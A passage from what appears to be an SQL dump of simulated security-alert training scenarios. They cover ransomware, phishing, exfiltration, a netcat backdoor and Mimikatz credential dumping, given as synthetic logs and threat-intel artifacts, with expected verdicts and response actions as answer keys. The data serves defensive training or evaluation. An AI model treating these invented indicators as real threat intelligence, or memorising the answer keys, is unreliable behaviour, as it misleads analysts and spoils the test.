Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:57:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:56:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key 
Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:55:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"},{\"timestamp\":\"2026-03-15T20:54:15.531Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 
count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:18Z\\\",\\\"event_id\\\":7045,\\\"system\\\":{\\\"host\\\":\\\"host1234.corp.local\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"user\\\":\\\"SYSTEM\\\"},\\\"event\\\":{\\\"type\\\":\\\"Registry Modification\\\",\\\"action\\\":\\\"Key Added\\\",\\\"key_path\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\MaliciousApp\\\",\\\"key_value\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\"},\\\"scheduled_task\\\":{\\\"name\\\":\\\"UpdateTask\\\",\\\"action\\\":\\\"Create\\\",\\\"command\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"trigger\\\":\\\"Daily\\\"},\\\"network\\\":{\\\"source_ip\\\":\\\"192.168.1.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\"},\\\"file\\\":{\\\"path\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"3f7854a9b2e774b6c7f4b8b7a9d3e9f0\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1560, 'Lateral Movement Detected Across Network', 'high', 'Network traffic analysis', 'Anomalous lateral movement detected from compromised host attempting to connect to multiple internal systems, indicating potential spread of malicious software.', 'Lateral Movement', 'T1570 - Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T11:32:45Z\",\"source_ip\":\"192.168.1.10\",\"destination_ips\":[\"10.0.0.25\",\"10.0.0.30\"],\"external_attacker_ip\":\"203.0.113.45\",\"command\":\"smbclient\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"user\":\"internal_user1\",\"filename\":\"payload.dll\",\"event_id\":\"4624\",\"event_type\":\"Network Connection\",\"protocol\":\"SMB\"}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Compromised internal host attempting lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP linked to APT activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with ransomware payload.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Payload used for lateral movement and execution.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1561, 'Data Exfiltration Attempt Identified', 'critical', 'Data loss prevention (DLP) systems', 'An advanced data exfiltration attempt was detected, involving the transfer of sensitive files to an external IP address. This is part of a known tactic used by Hive actors to conduct double extortion by leveraging stolen data.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:55Z\",\"event_id\":\"DLP-EXFIL-2023-0005\",\"source_ip\":\"10.0.2.15\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"file_hash\":\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\",\"user\":\"john_doe\",\"action\":\"allowed\",\"rule_triggered\":\"Sensitive Data Transfer\",\"alert_severity\":\"Critical\"}', '2026-03-15 19:13:09', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known data exfiltration activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"File hash linked to potential data exfiltration malware.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john_doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Active directory user account.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP Logs\",\"verdict\":\"suspicious\",\"details\":\"Contains sensitive financial 
data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.538Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:55Z\\\",\\\"event_id\\\":\\\"DLP-EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"10.0.2.15\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"file_hash\\\":\\\"5e884898da28047151d0e56f8dc6292773603d0d6aabbddf\\\",\\\"user\\\":\\\"john_doe\\\",\\\"action\\\":\\\"allowed\\\",\\\"rule_triggered\\\":\\\"Sensitive Data Transfer\\\",\\\"alert_severity\\\":\\\"Critical\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | 
head 100\"}}', 0),
(1562, 'Initial Access: Spear Phishing Campaign', 'high', 'Email Gateway Logs', 'A spear phishing email was detected targeting key personnel to compromise user credentials and gain network access. The email contained a malicious attachment and was sent from an external IP address associated with known threat actor ALPHV.', 'Phishing', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:12Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"email_subject\":\"Urgent: Update Your Account Information\",\"sender_email\":\"john.doe@maliciousdomain.com\",\"recipient_email\":\"jane.smith@company.com\",\"attachment\":{\"filename\":\"Account_Update.docx\",\"md5_hash\":\"d41d8cd98f00b204e9800998ecf8427e\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with ALPHV phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used in phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Account_Update.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Analysis Service\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used in phishing attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware used by 
ALPHV.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access: Spear Phishing Campaign\",\"date\":\"2026-03-15T20:58:15.542Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1563, 'Execution: Rust-Based Ransomware Deployment', 'high', 'Endpoint Detection and Response (EDR) System', 'The ALPHV ransomware group has deployed a Rust-based ransomware payload on an internal network device, aiming to encrypt critical data files using advanced encryption techniques. This is the second step in their operation, following initial access.', 'Malware', 'T1059.006', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:45Z\",\"event_id\":\"EDR-8764\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.2.3.15\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"process_name\":\"ransomware_exe.exe\",\"file_hash\":\"b0c4d5e3f6a7b8c9d1e2f3a4b5c6d7e8f9g0h1i2\",\"file_path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\ransomware_exe.exe\",\"malware_family\":\"ALPHV\",\"detected_action\":\"file execution\",\"severity_level\":\"high\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised endpoint.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.2.3.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address targeted for ransomware deployment.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware operations.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ransomware_exe.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious\",\"verdict\":\"malicious\",\"details\":\"File associated with the ALPHV ransomware 
family.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"b0c4d5e3f6a7b8c9d1e2f3a4b5c6d7e8f9g0h1i2\",\"is_critical\":true,\"osint_result\":{\"source\":\"malicious\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of the ALPHV ransomware campaign.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1564, 'Persistence: Establishing Backdoor Access', 'high', 'Network Traffic Analysis', 'Detected unusual outbound traffic patterns indicative of backdoor installation by the ALPHV group. Analysis reveals communication with known malicious IP addresses and the execution of suspicious binaries.', 'Backdoor', 'T1105: Ingress Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.57\",\"dst_ip\":\"203.0.113.45\",\"protocol\":\"TCP\",\"dst_port\":4444,\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"filename\":\"netcat.exe\",\"username\":\"compromised_user\",\"event_type\":\"network_connection\",\"direction\":\"outbound\",\"action\":\"allowed\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.57\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised system\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with ALPHV group\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":false,\"osint_result\":{\"source\":\"malwaredb\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious netcat binary\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"netcat.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"malicious\",\"details\":\"Executable used for unauthorized remote access\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"userdb\",\"verdict\":\"suspicious\",\"details\":\"Account observed in suspicious 
activity\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1565, 'Lateral Movement: Network Propagation', 'critical', 'SIEM Alerts', 'ALPHV has successfully moved laterally within the network, exploiting weak credentials and unpatched systems to expand control over additional systems. Credential dumping activity detected during the operation.', 'Credential Dumping', 'T1003', 1, 'new', NULL, '{\"timestamp\":\"2023-10-22T14:37:45Z\",\"event_type\":\"credential_dumping\",\"source_ip\":\"185.243.115.84\",\"destination_ip\":\"192.168.1.15\",\"user\":\"compromised_user\",\"file_name\":\"lsass_dump.dmp\",\"hash\":\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\",\"action\":\"dumped_credentials\",\"description\":\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\"}', '2026-03-15 19:13:33', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.243.115.84\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account used in lateral movement.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass_dump.dmp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File associated with credential dumping.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Mimikatz 
sample.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS process.\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.555Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-22T14:37:45Z\\\",\\\"event_type\\\":\\\"credential_dumping\\\",\\\"source_ip\\\":\\\"185.243.115.84\\\",\\\"destination_ip\\\":\\\"192.168.1.15\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"file_name\\\":\\\"lsass_dump.dmp\\\",\\\"hash\\\":\\\"3a4b55c88d2f4b6a9ccf3c4e9d6d8e4b\\\",\\\"action\\\":\\\"dumped_credentials\\\",\\\"description\\\":\\\"ALPHV actor utilized Mimikatz to dump credentials from LSASS 